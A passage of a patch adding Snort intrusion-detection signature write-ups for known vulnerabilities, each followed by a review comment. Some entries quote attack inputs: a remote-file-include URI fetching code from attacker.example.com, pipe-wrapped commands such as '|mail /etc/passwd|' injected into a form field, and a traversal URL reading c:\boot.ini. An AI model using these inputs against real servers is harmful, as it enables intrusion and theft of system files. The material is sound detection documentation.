+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
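Review bot: the third paragraph of Detailed Information ("Some applications do not perform stringent checks when validating the credentials of a client host ...") and the Attack Scenarios text about "an authentication mechanism" are generic CGI-access boilerplate that do not describe a remote file include; for an RFI via "insPath" in "search.php" the scenario is the attacker passing a URL to a script they control so that the server includes and executes it. "ona web server" is missing a space. "All systems running CGI applications using BosClassifieds" is odd wording for Affected Systems; name the BosClassifieds versions known to be vulnerable if available. Additional References is empty.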
--- /dev/null
+++ b/doc/signatures/3024.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3024
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
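Review bot: "heterogenous" should be "heterogeneous" and "server.The" is missing a space after the full stop. Additional References is empty; for an integer overflow in Samba 3.0.8 and prior in ACL handling there is a vendor advisory that should be cited so the reader can confirm the fixed release. "None Known" here is capitalized differently from the other files, and Corrective Action lacks a full stop.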
--- /dev/null
+++ b/doc/signatures/100000477.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000477
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "subject.php" with SQL commands being passed as the "MainID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "MainID" parameter in the "subject.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
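Review bot: same template problem as the other CGI entries in this patch: the paragraph beginning "This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server." talks about validating client credentials, which is unrelated to SQL injection via "MainID" in "subject.php"; drop it and fix "ona". Impact claims "Possible execution of arbitrary code of the attackers choosing in some cases" without saying how (it depends on the database backend); either qualify it or remove it. The only reference is a general SQL injection article; add the VBZoom advisory.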
--- /dev/null
+++ b/doc/signatures/2722.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2722
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_object_to_flavor
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
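Review bot: same issues as 2740.txt: the stray line break before ". This procedure is included in" splits the sentence naming add_object_to_flavor, "Oracle Oracle9i" repeats the vendor, Corrective Action lacks a full stop, and Additional References is empty. Since the two files differ only in the procedure name, generate them from one corrected template so the fixes land in both.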
--- /dev/null
+++ b/doc/signatures/3345.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3345
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
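Review bot: this file is identical to 3381.txt (and 3386.txt) apart from the Sid; an analyst cannot tell from the documentation why three separate rules exist. Each entry should name what its rule keys on. The shared defects apply here too: "Expoit" for "Exploit", an Attack Scenarios paragraph about a long filename via a network share that does not match the RPC-port description above it, and an empty Additional References section.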
--- /dev/null
+++ b/doc/signatures/2226.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2226
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP application pmachine.
+
+--
+Impact:
+Execution of arbitrary code possibly leading to a remote shell.
+
+--
+Detailed Information:
+Versions of PMachine do not properly check included files and it is 
+possible for an attacker to include a file of their choosing which may 
+lead to arbitrary code execution on the target host.
+
+--
+Affected Systems:
+	PMachine PMachine 2.2.1
+
+--
+Attack Scenarios:
+The attacker can include a file of their choosing by appending the file 
+URI to the end of a URI for the application.
+
+Proof of concept URI by FrogMan:
+
+http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
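Review bot: Additional References is empty even though Attack Scenarios quotes a "Proof of concept URI by FrogMan"; cite the advisory it came from. The Summary says "pmachine" while the rest of the file uses "PMachine", and "PMachine PMachine 2.2.1" under Affected Systems repeats the vendor name. Corrective Action "Upgrade to the latest non-affected version" should name the first fixed release; with only 2.2.1 listed, the reader cannot tell whether earlier versions are also affected, which Detailed Information ("Versions of PMachine do not properly check included files") implies.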
--- /dev/null
+++ b/doc/signatures/979.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+979
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross-site scripting vulnerability associated with a file having a .htw extension.
+
+--
+Impact:
+Cross-site scripting.  This attack may allow the execution of arbitrary commands on a victim host that visits a vulnerable server.
+
+--
+Detailed Information:
+The Microsoft Indexing Service is vulnerable to a cross-site scripting exploit because of a failure to properly filter user input associated with files with a .htw extension.  This vulnerability is associated with Indexing Service component (CiWebHitsFile). This may allow an attacker to execute abitrary code on the victim host that visits the vulnerable server.
+
+--
+
+Affected Systems:
+Microsoft Indexing Services for Windows NT 4.0 and Windows 2000
+
+
+--
+Attack Scenarios:
+An attacker can inject malicious code in a vulernable server.  This may allow execution of arbitrary code on the victim host that visits the vulnerable server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch discussed in the referenced Microsoft Bulletin.
+ 
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1861
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0942
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-084.asp
+
+--
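Review bot: Impact and Detailed Information overstate a cross-site scripting bug: "execution of arbitrary commands on a victim host that visits a vulnerable server" and "execute abitrary code on the victim host" describe remote code execution, whereas XSS runs attacker-supplied script in the visiting user's browser in the context of the vulnerable site (cookie and session theft, as 1380.txt in this patch puts it). Rephrase accordingly and fix "abitrary" and "vulernable". Corrective Action says "the referenced Microsoft Bulletin"; name it inline (MS00-084, per the URL under Additional References) so the section stands on its own.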
--- /dev/null
+++ b/doc/signatures/1809.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1809
+
+--
+Summary:
+This event is generated when an attempt is made to infect a web server by the "Scalper" worm.
+
+--
+Impact:
+An infected server will open ports and listen for commands as well as 
+attempt to infect more systems.
+
+--
+Detailed Information:
+This worm takes advantage of the chunked encoding vulnerability in 
+Apache to infect new systems. Once infected, the worm opens UDP port 
+2001 and will listen for additional commands. It will also begin 
+scanning for new hosts to infect.
+
+--
+Affected Systems:
+Version of Apache 1.3 up to and including 1.3.24 and versions of Apache 
+2.0 up to 2.0.36. All versions of Apache 1.2 are vulnerable. This worm 
+will only infect systems running FreeBSD.
+
+--
+Attack Scenarios:
+Typical self-replicating worm.
+
+--
+Ease of Attack:
+Simple. This is worm activity and is fully automated.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade your installation of Apache if you are running a vulnerable 
+version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Symantec
+http://securityresponse.symantec.com/avcenter/venc/data/freebsd.scalper.worm.html
+
+--
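Review bot: Corrective Action only says to upgrade Apache, but Detailed Information states the worm "opens UDP port 2001 and will listen for additional commands"; upgrading does not remove an existing infection, so add the response steps that follow from that: check hosts for a listener on UDP/2001, block that port at the perimeter, and clean or rebuild any infected host. "Version of Apache 1.3" should be "Versions of Apache 1.3".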
--- /dev/null
+++ b/doc/signatures/1267.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1267
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) nisd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port nisd is using.  Attackers can also learn what versions of the nisd protocol are accepted by nisd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as nisd run.  The nisd RPC service implements Network Information Systems (NIS and NIS+).  NIS and NIS+ provide centralized management and distribution of information about resources, such as users and hosts, in a network domain.  A buffer overflow exists because of improper bounds checking, which can lead to execution of arbitrary commands on the host. 
+
+--
+Affected Systems:
+Solaris 2.3 - 2.6 hosts running NIS+.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where nisd runs.  This may be a precursor to accessing nisd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access nisd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for nisd, not probes of the nisd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the nisd service itself. An attacker may attempt to go directly to the nisd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/677
+
+CERT
+http://www.cert.org/advisories/CA-98.06.nisd.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS21
+
+
+--
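Review bot: in Detailed Information the sentence "A buffer overflow exists because of improper bounds checking, which can lead to execution of arbitrary commands on the host." has no subject; say that the overflow is in the nisd service (the CA-98.06 reference) and that this rule only sees the portmap lookup that may precede it, which False Negatives already explains well. Affected Systems "Solaris 2.3 - 2.6 hosts running NIS+" describes the overflow, not the probe; the GETPORT request will fire against any host running nisd, so state both.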
--- /dev/null
+++ b/doc/signatures/3386.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3386
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
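Review bot: third verbatim copy of the RPC DCOM text (see 3381.txt and 3345.txt in this patch). Besides the shared defects ("Expoit", an Attack Scenarios paragraph that does not match the RPC-port description, empty Additional References), having three sids with identical documentation means the rule-specific detail, what each one matches, is missing from all three.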
--- /dev/null
+++ b/doc/signatures/1380.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1380
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
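Review bot: Corrective Action only tells the application owner to "properly validate input", but the Detailed Information paragraph correctly locates the defect in reflecting input into the HTML of a new page without filtering; the advice should name output encoding of user-supplied data in HTML context as the fix, since input validation on its own does not prevent reflected cross-site scripting. Minor: "legimately" under False Positives should be "legitimately", the separator before Additional References carries a trailing space ("-- "), and Additional References is empty even though Ease of Attack refers to known vulnerable applications.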
--- /dev/null
+++ b/doc/signatures/904.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+904
+
+--
+Summary:
+This event is generated when an attempt is made to access an Example 
+application on a Coldfusion 4.x server. 
+
+--
+Impact:
+Serious. The vulnerability is not limited to files in the webspace, so 
+system files or additional unexecuted code files could be retrieved and 
+examined for vulnerabilities.
+
+--
+Detailed Information:
+ColdFusion (Macromedia, formerly Allaire) web servers have several 
+default Example applications installed that have vulnerabilities.  The 
+email application can be exploited to allow remote viewing of arbitrary 
+files.
+
+--
+Affected Systems:
+ColdFusion versions 4.0 thru 4.5 (4.5.1 is not vulnerable), on all 
+supported platforms
+
+--
+Attack Scenarios:
+The file at cfdocs/exampleapp/email/application.cfm includes a page,
+cfdocs/exampleapp/email/getfile.cfm, that can accept URL-mangled 
+requests like:
+
+http://www.server.com/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+
+This allows trivial remote retrieval of any file on the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If ColdFusion 4.x's example code is being used, This rule will generate 
+an event.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Delete all example code.  This is one of several significant 
+vulnerabilities that are exploitable if the example code is left on a 
+production server.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Darryl Davidson <ddavidson@talisman-intl.com>
+
+-- 
+Additional References: CAN-2001-0535 
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0535
+
+--
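Review bot: the CAN-2001-0535 identifier sits on the "Additional References:" heading line instead of in the CVE entry below it, which differs from every other file in this patch; drop it from the heading, the CVE URL already carries it. Minor: "This rule" is capitalised mid-sentence under False Positives, "thru" under Affected Systems should be "through", and the separator before Additional References has a trailing space.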
--- /dev/null
+++ b/doc/signatures/882.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+882
+
+--
+Summary: 
+This event is generated when an attempt is made to access a web 
+application that may lead to exploitation of the application.
+
+--
+Impact: 
+Potentially harmful execution of binaries through perl open()
+
+--
+Detailed Information: 
+An open source calendar perl script by Matt Kruse, Allows commands to be executed without input verification using the perl open() function. ie /cgi-bin/calendar_admin.pl place the string "|ping 127.0.0.1|" in the configuration file field, this executes the command "ping 127.0.0.1" 
+
+--
+Affected Systems:
+Any web server running the application.
+
+--
+Attack Scenarios: 
+An unauthenticated user can execute arbitrary programs on the server by accessing calendar_admin.pl and inputting commands such as "|mail /etc/passwd|" into the configuration file field.
+
+--
+Ease of Attack: 
+Simple. No exploit software required.
+
+--
+False Positives: 
+If your webserver has pages by the name of calendar* this rule will
+fire often. Many sites now use calendar applications and this rule may 
+generate a large number of false positives, it does not distinguish 
+between perl cgi applications and php scripts. Consider tuning this rule
+for your site if it is generating a large number of false positives. If 
+you use a calendar application, consider changing the name of the script
+to something other than "calendar".
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+Download a newer version of the cgi 
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Snort documentation contributed by Aaron Navratil (Initial Research)
+Snort documentation contributed by Josh Gray (Edits)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0432
+
+Bugtraq:
+http://online.securityfocus.com/bid/1215
+
+--
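Review bot: Corrective Action ("Download a newer version of the cgi") gives no vendor, version or location, so a reader cannot tell which release fixes the open() command injection; please state the fixed version or point at the Bugtraq entry already listed under Additional References. The Detailed Information paragraph is also one run-on sentence with an unexplained "ie"; splitting it into what the script does (passes the configuration file field to perl's open() unsanitised) and the consequence (the shell command between the pipe characters runs) would read better.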
--- /dev/null
+++ b/doc/signatures/100000793.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000793
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "line1" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
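Review bot: the Impact and Detailed Information sections reuse the remote-file-include boilerplate ("unauthorized administrative access to the server", "execute system binaries") for what the Summary describes as a cross site scripting bug in the "line1" parameter of blogroll.php; script injected this way runs in the victim's browser, so the impact should be stated as theft of cookies or session identifiers and actions performed as that user, the way 1380.txt in this same patch states it. Affected Systems ("All systems running CGI applications using Pivot") is likewise boilerplate, and Pivot is a PHP application rather than a CGI one. The separators after the Sid, Affected Systems and Contributors sections are missing the blank line used everywhere else.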
--- /dev/null
+++ b/doc/signatures/2208.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2208
+
+--
+Summary:
+This event is generated when an attempt is made to access fom.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting vulnerability in Faq-O-Matic.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+Faq-O-Matic is a CGI-based system that automates FAQ maintenance on a web server. Versions 2.712 and lower contain a cross-site scripting vulnerability where an attacker can craft a URL with malicious code in the "cmd" argument. If a legitimate user activates the URL, malicious code may be executed on the client computer with the security context of the web server.
+
+--
+Affected Systems:
+Systems running or accessing Faq-O-Matic version 2.712 or lower.
+
+--
+Attack Scenarios:
+An attacker crafts a URL that, when activated by a legitimate user, obtains the session cookie. This can allow the attacker to pose as the user for the duration of the session.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses fom.cgi, this rule may generate an alert.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Faq-O-Matic version 2.713 or higher. Upgrades are available at http://faqomatic.sourceforge.net.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4023
+
+--
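Review bot: the Detailed Information claim that "malicious code may be executed on the client computer with the security context of the web server" is wrong for cross-site scripting: the injected script runs in the user's browser, inside the origin of the Faq-O-Matic site and with that user's session, not with the web server's privileges. The Impact line "Arbitrary code execution" overstates the bug for the same reason; the Attack Scenarios paragraph (session cookie theft, impersonating the user for the session) is the accurate description and the other two sections should be brought in line with it.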
--- /dev/null
+++ b/doc/signatures/1463.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1463
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
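Review bot: this file has no Affected Systems section, which every other signature document in this patch carries; even a generic entry (hosts running IM or IRC client software) keeps the layout consistent for anything that parses these sections. "Sid: 1463" is also written on one line rather than the two-line form used elsewhere, and "unkown" under Impact should be "unknown".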
--- /dev/null
+++ b/doc/signatures/2400.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2400
+
+--
+Summary:
+This event is generated when an attempt is made to access the CGI script
+edittag.pl.
+
+--
+Impact:
+Information Disclosure
+
+--
+Detailed Information:
+EditTag is a perl script that can be used to manage web site content.
+
+The edittag.pl CGI script may allow an attacker to leverage a directory
+traversal attack on a web server. Due to insufficient checks on user
+supplied input, it may be possible for an attacker to supply encoded
+"../" characters to traverse out of the web root and view sensitive
+system files on the web server.
+
+--
+Affected Systems:
+	EditTag
+
+--
+Attack Scenarios:
+An attacker can utilize this vulnerability to gain sensitive information
+that may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
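Review bot: Corrective Action ("Upgrade to the latest non-affected version") and Affected Systems ("EditTag") give no version information and Additional References is empty, so an analyst has nothing with which to decide whether a given EditTag installation is vulnerable; please add the affected versions and an advisory reference. Detailed Information says the traversal relies on encoded "../" sequences; if the rule only matches one encoding, that is worth stating under False Negatives rather than "None known".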
--- /dev/null
+++ b/doc/signatures/100000338.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000338
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpMyDirectory" application running on a webserver. Access to the file "header.php" using a remote file being passed as the "ROOT_PATH" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
